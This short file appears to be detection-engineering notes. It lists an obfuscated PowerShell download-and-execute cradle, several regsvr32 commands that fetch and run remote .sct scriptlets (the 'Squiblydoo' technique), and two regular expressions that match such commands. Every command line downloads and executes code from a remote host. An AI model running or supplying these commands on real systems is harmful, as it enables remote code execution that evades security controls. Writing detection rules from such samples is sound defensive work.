[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).("D`o`Wn"+"LoAdStRiNg").Invoke('https://github.com/msffluffybunnies/rabbithole/blob/master/test.txt?raw=true')

Regsrv32.exe /s /u /n /i:https://domain.co/testfile.wsc adllfile.dll

 \/i\:(\")?(http|\/\/|\\\\).*
 
 regsvr32(\.exe)?(.*)\/i\:(\")?(http|\/\/|\\\\).*
 
powershell.exe "regsvr32 /s /n /u /i:http://192.168.1.109:8080/xo31Jt5dIF.sct scrobj.dll"

regsvr32 /s /n /u /i:http://192.168.1.109:8080/xo31Jt5dIF.sct c:\windows\system32\scrobj.dll

regsvr32 /s /n /u /i:\\192.168.1.109:8080/xo31Jt5dIF.sct scrobj.dll
